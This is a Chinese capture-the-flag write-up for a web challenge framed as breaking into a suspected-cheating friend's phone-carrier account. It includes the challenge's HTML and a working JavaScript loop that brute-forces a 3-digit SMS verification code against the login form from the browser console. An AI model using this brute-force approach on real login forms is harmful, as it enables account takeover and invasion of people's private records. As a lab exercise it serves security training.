题目:
Tips:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666
writeup:
- 打开题目链接是一个输入验证码提交的题目,点击获取验证码
手机验证码是:验证码发到手机上了,你看不到..是3位纯数字,开头不为0
看来是要暴力破解了。。。 - 破解之前要先知道表单的字段,查看源代码
<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script src="../jquery-2.0.3.js"></script> </head> <body> 请使用手机短信验证码登陆 <br>Tips:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! <br>闺蜜手机号码:13388886666 <form action="login.php" method="POST"> Phone: <input type="text" value="13388886666" name="username" id="username"><br> Vcode: <input type="text" value="" name="vcode"><br> <a href="#" class="getcode">点击获取手机验证码</a> <input type="submit" value="submit" name="Login"><br> </form> </body> </html> <script> $(".getcode").click(function(){ var url="./vcode.php"; $.post(url,{'getcode':'1','mobi':$("#username").val()},function(data){ alert("手机验证码是:"+data); }); }); </script>
- 可以用工具或脚本破解,这里由于数位不多我直接用js写了个脚本(网页中包含了jquery库,可以利用)
var getKey=function(phone){//phone指登陆号码 var i=100; while(i<1000){ $.post('login.php',{username:phone,vcode:''+i},function(data){ if(data.indexOf('error')==-1) alert(data); }); i++; } }
- 打开web控制台粘贴上面的代码回车,然后执行函数
你伤心的发现他/她正在跟你的前男/女友勾搭.....于是下决心看看前任除了跟你的(男/女)闺蜜勾搭,是不是还跟别的勾搭..<br>前任的手机号码是:13399999999
会弹出这个结果。那么换上新号码在执行函数key is LKK8*(!@@sd
弹出结果,获得key。
注意:用的ajax,破解时发的请求多可能会卡但只有一小会儿。